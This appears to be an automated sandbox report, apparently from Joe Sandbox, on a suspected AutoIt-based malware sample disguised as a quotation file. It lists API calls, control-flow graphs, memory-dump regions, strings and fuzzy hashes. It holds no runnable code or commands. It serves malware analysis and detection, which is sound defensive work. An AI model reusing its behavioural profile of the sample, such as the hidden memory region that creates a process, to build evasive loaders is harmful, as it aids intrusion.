                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: c377890cba860f52b496fb33b514aed2264f9f9357e51ad6459d3805b4b8781c
                                                                                                                    • Instruction ID: 636be5515488bb3a1f2ae2571f31342d39366c4dedb21e6f06b70397c5ad683d
                                                                                                                    • Opcode Fuzzy Hash: c377890cba860f52b496fb33b514aed2264f9f9357e51ad6459d3805b4b8781c
                                                                                                                    • Instruction Fuzzy Hash: AD414C32B40288BBDB156B79DD4DBFD3659FB06360F040125F902DA1A2DB758EC0B7A1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015FD69D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                    • Instruction ID: dd6b286a5afd53c19d106a979673c773ed75c5d8649bba8f5c9381b0540c0320
                                                                                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                    • Instruction Fuzzy Hash: 4E51C675A50248BBEB60DFE4CC49FDE7BB8BF48701F108958F61AEF180DA7496448B64

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F12C91
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F12CB2
                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F11CAD,?), ref: 00F12CC6
                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F11CAD,?), ref: 00F12CCF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: 1d77efcbe94a056e81a2eb8148c298537651410a56b0c4d79a0b14c31b05ad75
                                                                                                                    • Instruction ID: adc431002a4ec24a83f9557b21874629043ef246781918de4c79d106525406c4
                                                                                                                    • Opcode Fuzzy Hash: 1d77efcbe94a056e81a2eb8148c298537651410a56b0c4d79a0b14c31b05ad75
                                                                                                                    • Instruction Fuzzy Hash: 84F0DAB55402D87EEB311717AC88E773EBDE7CBF50B00005AF900AB5A0C6721851FAB1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 015FEFF8: Sleep.KERNELBASE(000001F4), ref: 015FF009
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015FF223
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: 2F84QIWUO8402KG97H4AJS3F7NBV
                                                                                                                    • API String ID: 2694422964-1596355192
                                                                                                                    • Opcode ID: b0c1f41a35b06686610917fd4522cad491b9c7ed3992609d274c12db0ee0b631
                                                                                                                    • Instruction ID: e99b2c43a3312d289f01dd4eb2134676e0bd763040e18fbb9a9e17a1d1ba347f
                                                                                                                    • Opcode Fuzzy Hash: b0c1f41a35b06686610917fd4522cad491b9c7ed3992609d274c12db0ee0b631
                                                                                                                    • Instruction Fuzzy Hash: 1551A471D04289DAEF12D7A4C858BEEBFB8AF15304F04419DE6487B2C1D7B90B49CB65

Control-flow Graph
control_flow_graph 717 f13b1c-f13b27 718 f13b99-f13b9b 717->718 719 f13b29-f13b2e 717->719 721 f13b8c-f13b8f 718->721 719->718 720 f13b30-f13b48 RegOpenKeyExW 719->720 720->718 722 f13b4a-f13b69 RegQueryValueExW 720->722 723 f13b80-f13b8b RegCloseKey 722->723 724 f13b6b-f13b76 722->724 723->721 725 f13b90-f13b97 724->725 726 f13b78-f13b7a 724->726 727 f13b7e 725->727 726->727 727->723
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F13B0F,SwapMouseButtons,00000004,?), ref: 00F13B40
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F13B0F,SwapMouseButtons,00000004,?), ref: 00F13B61
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F13B0F,SwapMouseButtons,00000004,?), ref: 00F13B83
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: addff0664ff5f7f9c664d7a05a5ee50760040429bcc2121877202f7c92b3a0aa
• Instruction ID: a68cfb62dc82f1ff4fc304210acb5ab8610a449c6db158da9e270f656d95a44b
• Opcode Fuzzy Hash: addff0664ff5f7f9c664d7a05a5ee50760040429bcc2121877202f7c92b3a0aa
• Instruction Fuzzy Hash: 9F112AB5514208FFDB20CFA5DC44AEFBBB8EF45754B108459A805D7110E2319E80A7A0
Strings
• Variable must be of type 'Object'., xrefs: 00F632B7
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: f43153ffa8923c76e2cfbe5bed71fb3c0389cf80d13f488539aa65db1b6d21a5
• Instruction ID: 55f3d0fee54423652e9015185545973c33c0fe06317cc22a6f1c9e16e6fc7ea7
• Opcode Fuzzy Hash: f43153ffa8923c76e2cfbe5bed71fb3c0389cf80d13f488539aa65db1b6d21a5
• Instruction Fuzzy Hash: CCC27975E00215CFCB24CF58C880BADB7B1BF18320F248569ED56AB291D775ED82EB91

Control-flow Graph
control_flow_graph 1238 f13923-f13939 1239 f13a13-f13a17 1238->1239 1240 f1393f-f13954 call f16270 1238->1240 1243 f53393-f533a2 LoadStringW 1240->1243 1244 f1395a-f13976 call f16b57 1240->1244 1246 f533ad-f533b6 1243->1246 1250 f533c9-f533e5 call f16350 call f13fcf 1244->1250 1251 f1397c-f13980 1244->1251 1248 f13994-f13a0e call f32340 call f13a18 call f34983 Shell_NotifyIconW call f1988f 1246->1248 1249 f533bc-f533c4 call f1a8c7 1246->1249 1248->1239 1249->1248 1250->1248 1264 f533eb-f53409 call f133c6 call f13fcf call f133c6 1250->1264 1251->1246 1253 f13986-f1398f call f16350 1251->1253 1253->1248 1264->1248
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F533A2
  • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F13A04
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
• Opcode ID: d023eca7b2301bf2e7dc1c56e13378f2a943308bd39e7e1a105a04d5604cea85
• Instruction ID: 9ea926ef1b92a2300f8ef346a3261b59f3ede2e8e63ed87f05a20c103ee1b14c
• Opcode Fuzzy Hash: d023eca7b2301bf2e7dc1c56e13378f2a943308bd39e7e1a105a04d5604cea85
• Instruction Fuzzy Hash: EF31C671408344AED725EB20DC45FEFB7D8AF44720F00452AF59993191DF789689EBC2

Control-flow Graph
control_flow_graph 1274 f2fddb-f2fdde 1275 f2fded-f2fdf0 call f3ea0c 1274->1275 1277 f2fdf5-f2fdf8 1275->1277 1278 f2fde0-f2fdeb call f34ead 1277->1278 1279 f2fdfa-f2fdfb 1277->1279 1278->1275 1282 f2fdfc-f2fe00 1278->1282 1283 f2fe06-f3066d call f3059c call f332a4 1282->1283 1284 f3066e-f30690 call f305cf call f332a4 1282->1284 1283->1284 1293 f30692 1284->1293 1294 f30697 1284->1294 1293->1294
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00F30668
  • Part of subcall function 00F332A4: RaiseException.KERNEL32(?,?,?,00F3068A,?,00FE1444,?,?,?,?,?,?,00F3068A,00F11129,00FD8738,00F11129), ref: 00F33304
• __CxxThrowException@8.LIBVCRUNTIME ref: 00F30685
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 1d51f19e7d5be29c02806b05e98be2e3eba29a72943c9b05f509efa67d471e4d
• Instruction ID: 027d44a78bd18a5cb00105a13659a00c0094f9480c1e416cab69c947ce48ec2f
• Opcode Fuzzy Hash: 1d51f19e7d5be29c02806b05e98be2e3eba29a72943c9b05f509efa67d471e4d
• Instruction Fuzzy Hash: 76F0C23490020DB7CB00F6A4EC56D9E777C9E00370FA04532B824D6596EF75EA6AF981
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 015FDD7D
• ExitProcess.KERNEL32(00000000), ref: 015FDD9C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
• Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
• Instruction ID: 3d76bc23b33d572fc201eefb61ef30f62c5807e7d91c69a89f685401cad75a4d
• Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
• Instruction Fuzzy Hash: 32F0C976540249ABDB60EFE0CC49FEE7778BB44701F408909BB0A9A180DA7496088B61
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F982F5
• TerminateProcess.KERNEL32(00000000), ref: 00F982FC
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00F984DD
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 6b808b310a74b0e5d4846e18be48b8838d5c7704ccf55b66d3ee5f3b3b9cbd18
• Instruction ID: e3eefad2e4edf5d3ccd0a2defd1e7ea7a34bb2d2a5a6af9fdc055dfec9fb5124
• Opcode Fuzzy Hash: 6b808b310a74b0e5d4846e18be48b8838d5c7704ccf55b66d3ee5f3b3b9cbd18
• Instruction Fuzzy Hash: E7127C71A083019FDB14DF28C484B6ABBE5FF85364F04895DE8898B252CB35ED46DF92
APIs
  • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F11BF4
  • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F11BFC
  • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F11C07
  • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F11C12
  • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F11C1A
  • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F11C22
  • Part of subcall function 00F11B4A: RegisterWindowMessageW.USER32(00000004,?,00F112C4), ref: 00F11BA2
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F1136A
• OleInitialize.OLE32 ref: 00F11388
• CloseHandle.KERNEL32(00000000,00000000), ref: 00F524AB
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: d457c21cee50b8a44737cee8bd217f3063f94c6f6e912b5994b1a1adb5982943
• Instruction ID: e6568cf6cbb5c4c51e84106542e43b694424b6494599af787a4f5eac891db5d7
• Opcode Fuzzy Hash: d457c21cee50b8a44737cee8bd217f3063f94c6f6e912b5994b1a1adb5982943
• Instruction Fuzzy Hash: BC7191B59013C88FC784DF7BAD856993AE1FB89344798422AD10ACF362EB344585FF51
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,00F485CC,?,00FD8CC8,0000000C), ref: 00F48704
• GetLastError.KERNEL32(?,00F485CC,?,00FD8CC8,0000000C), ref: 00F4870E
• __dosmaperr.LIBCMT ref: 00F48739
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
APIs
• __Init_thread_footer.LIBCMT ref: 00F217F6
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00F52C8C
  • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
  • Part of subcall function 00F12DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F12DC4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13908
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F1949C,?,00008000), ref: 00F15773
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00F1949C,?,00008000), ref: 00F54052
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateFile
• String ID:
APIs
• __Init_thread_footer.LIBCMT ref: 00F1BB4E
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: LoadString
• String ID:
APIs
  • Part of subcall function 015FD618: GetFileAttributesW.KERNELBASE(?), ref: 015FD623
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 015FDEFB
Memory Dump Source
• Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile
• String ID:
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
APIs
  • Part of subcall function 00F14E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E9C
  • Part of subcall function 00F14E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F14EAE
  • Part of subcall function 00F14E90: FreeLibrary.KERNEL32(00000000,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14EFD
  • Part of subcall function 00F14E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E62
  • Part of subcall function 00F14E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F14E74
  • Part of subcall function 00F14E59: FreeLibrary.KERNEL32(00000000,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E87
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 00F44C7D: RtlAllocateHeap.NTDLL(00000008,00F11129,00000000,?,00F42E29,00000001,00000364,?,?,?,00F3F2DE,00F43863,00FE1444,?,00F2FDF5,?), ref: 00F44CBE
• _free.LIBCMT ref: 00F4506C
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
APIs
• RtlAllocateHeap.NTDLL(00000008,00F11129,00000000,?,00F42E29,00000001,00000364,?,?,?,00F3F2DE,00F43863,00FE1444,?,00F2FDF5,?), ref: 00F44CBE
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• FreeLibrary.KERNEL32(?,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14F6D
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00F5EE51,00FD3630,00000002), ref: 00F7CD26
  • Part of subcall function 00F7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00F7CD19,?,?,?), ref: 00F7CC59
  • Part of subcall function 00F7CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00F7CD19,?,?,?,?,00F5EE51,00FD3630,00000002), ref: 00F7CC6E
  • Part of subcall function 00F7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00F7CD19,?,?,?,?,00F5EE51,00FD3630,00000002), ref: 00F7CC7A
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Pointer$Write
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3847668363-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F12DC4
  • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
  • Part of subcall function 00F13837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13908
  • Part of subcall function 00F1D730: GetInputState.USER32 ref: 00F1D807
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F12B6B
  • Part of subcall function 00F130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F1314E
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
• String ID:
• API String ID: 3667716007-0
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 015FD623
Memory Dump Source
• Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00F50704,?,?,00000000,?,00F50704,00000000,0000000C), ref: 00F503B7
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
